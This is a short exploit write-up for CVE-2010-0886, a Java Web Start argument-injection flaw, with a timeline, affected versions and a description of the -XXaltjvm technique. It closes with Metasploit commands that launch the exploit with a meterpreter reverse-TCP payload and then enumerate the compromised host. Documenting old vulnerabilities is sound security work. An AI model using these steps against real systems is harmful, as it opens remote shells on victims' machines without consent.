CVE-2010-0886 : Sun Java Web Start Plugin Command Line Argument Injection

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy the 2010-04-09
Same vulnerability disclosed by Rubén the 2010-04-09
Metasploit PoC provided by jduck the 2010-04-14

    PoC provided by :

Tavis Ormandy
Rubén
jduck

    Reference(s) :

CVE-2010-0886

    Affected version(s) :

Java 6 Standard Edition prior to update 20

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 “are believed to be affected by this vulnerability.” In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

    Commands :

use exploit/windows/browser/java_ws_arginjec­t_altjvm
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig